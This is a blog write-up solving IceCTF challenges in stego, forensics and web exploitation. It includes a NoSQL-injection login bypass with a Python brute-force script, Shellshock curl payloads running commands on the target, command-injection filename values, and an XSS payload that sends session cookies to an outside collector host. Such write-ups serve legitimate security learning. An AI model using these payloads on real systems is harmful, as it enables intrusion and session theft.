IceCTF{Write_up_Stage3_Stage4}

8:22:00 AM Unknown 0 Comments




Stage 3 

Vape Nation Stego-50pt
Open up the Stego solve and swipe filters  the flag hidden in the Green plane 0 filter

Audio problems Forensics -50 pt
open up the sonic visualizer .Go ahead to layer->add Spectogramme.


R.I.P Transmission  Forensics -65 pt

 Looking for the header of the file ,it is an ELF binary file .

but when we execute the elf file ./rip nothing looking interesting. so ,I have decided to strings the content and investigate inside

strings rip >rip_strings | subl rip_strings

something weird ,Maybe ,an embedded file hidden inside . let's extract it.

foremost -T rip
a zip file with protected password comes out .Let's crack it with fcrackzip
fcrackzip -u -l 1-6 -c 'a1' 00002585.zip
password is :bunny

Extract the zip file and bingoo the flag is there

ChainedIn web 75 pt
The first thing that grabs my attention was in the home page foot bar .

 We all know that MongoDB is an NOSql backend so ,closely the vulnerability could be a NoSQL injection ,I have read some articles about this type of injection and how to exploit it,but this was a challenge in root-me that includes the same vuln .With Burpsuite we can see that authentication  sent in JSON Format .

 

{"user":"admin","pass":"admin"}

and the response is :
{"message":"Invalid credential !"}
Let's try to bypass the authentication : 
{"user":"admin","pass":{"$ne":"1"}}

We are authenticated as an administrator !! so, obviously its NoSQL injection good :D !
for more information visit this website http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html

Let's now try to guess the password ,
{"user":{"$ne":"1"},"pass":{"$regex":"I.*$"}}
the server return {"message":"Welcome back Administrator!"} 200 ok ,let's try mix up some other character
{"user":{"$ne":"1"},"pass":{"$regex":"v.*$"}}
the server return {"message":"Invalid Credentials"} 500 Internal Server Error .
we know that the pattern of the flag is IceCTF{ and the service return 200 ok for the true check and 500 for false one and this is can help us to guess the next character and get the flag.I have written a python script to retrieve the flag .

 
import requests
ascii_letters = 'IabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{-_}'
def url(password):
  r = requests.post('http://chainedin.vuln.icec.tf/login', json={"user": {"$ne": "1"},"pass":{"$regex":password}})
  return r.status_code

def comp(flag):
 for i in ascii_letters:
  ch=flag+i+'.*$'
  #print i
  if url(ch)==200:
   flag+=i
   break
 return i

if __name__ == "__main__":
 flag="IceCTF{"
 for x in xrange(1,60):
  flag+=comp(flag)
  print flag

The flag is : IceCTF{I_tou0gHT_Y0u_coulDNt_inJeCt_noSqL_tHanKs_monGo}

Geocities web 100 pt
This task  takes me a while to solve it ! the service seems clean nothing looking strange and the website looking very old .So,I have tried to scan the target to identifies anything ,I have used dir search,Nikto,vega but nothing came out ! so , reading more the challenge description looking for a hint and here we go, it's maybe shell Shock vulnerability because he said "It must be running some ancient technology and probably hasn't been updated in years" .I found this article very useful to start the exploit .
Let's check the vuln  
curl -A "() { :; }; echo 'Content-type: text/html'; echo; /usr/bin/id;" http://geocities.vuln.icec.tf/

Bingo ! it returns the uid and the gid so the service is vulnerable to Shell Sock attack
now run the bash in the host and ls the files
() { :; }; echo 'Content-type: text/html'; echo; /bin/bash -c 'ls'

cat get_posts.pl

User-Agent:() { :; }; echo 'Content-type: text/html'; echo; /bin/bash -c 'cat get_posts.pl'

Obviously ,the flag is hidden in the database we need to fetch the tables name on the DB change the code ,save it on ur host and download it to the machine using wget .

#!/usr/bin/perl
use strict;
use DBI;
my $dbh = DBI->connect(
    "dbi:mysql:dbname=geocities;host=icectf_mariadb",
    "geocities",
    "geocities",
    { RaiseError => 1 },
) or die $DBI::errstr;
my tables = $dbh->tables();
print tables;
$dbh->disconnect();
now change the code to select from 47a6fd2ca39d2b0d6eea1c30008dd889 table

#!/usr/bin/perl
 
use strict;
use DBI;
 
my $dbh = DBI->connect(
    "dbi:mysql:dbname=geocities;host=icectf_mariadb",
    "geocities",
    "geocities",
    { RaiseError => 1 },
) or die $DBI::errstr;
 
my $sth = $dbh->prepare("SELECT * FROM 47a6fd2ca39d2b0d6eea1c30008dd889");
$sth->execute();
 
my $row;
while ($row = $sth->fetchrow_arrayref()) {
    print "@$row[1];@$row[2];@$row[3]\n";
}
 
$sth->finish();
$dbh->disconnect();

The flag is : IceCTF{7h3_g0s_WEr3_5UpeR_wE1Rd_mY_3ye5_HUr7}
Intercepted Conversations Pt. 1
Intercepted Conversations Pt. 2

Stage 4

ImgBlog web 130 pt
 After register/login we have check  it the comment field it's vulnerable to XSS attack.


 we need to get the admin session to login as admin .
<img src=x onerror=this.src='http://requestb.in/xfkbrpxf?c='+document.cookie>

Now we get the admin session ,change the current session with cookie manager and refresh the page

 
session=eyJ1c2VyIjoxfQ.CpyE3w.eBmlIu3HEm7vpDtAlE63CbMIK5A

and here we go we are in !
I have tried a little bit to upload pictures and inject the file name with null byte ,double extension, and comment SQL injection ,but nothing works ,I noticed that the service filters our requests of "filename" field ,remove (dots),(splashes) then use the Linux bash ,I think it's shell_exec() function of PHP ! ,So,Let's inject export $PATH to see how it will react !

 The global path of linux is shown ! so let's ls files

 
filename=" $HOME | ls "

 We identified flag.txt file .

 
filename=" $HOME | cat fl* "

Unknown

0 comments:

Subscribe to: Post Comments (Atom)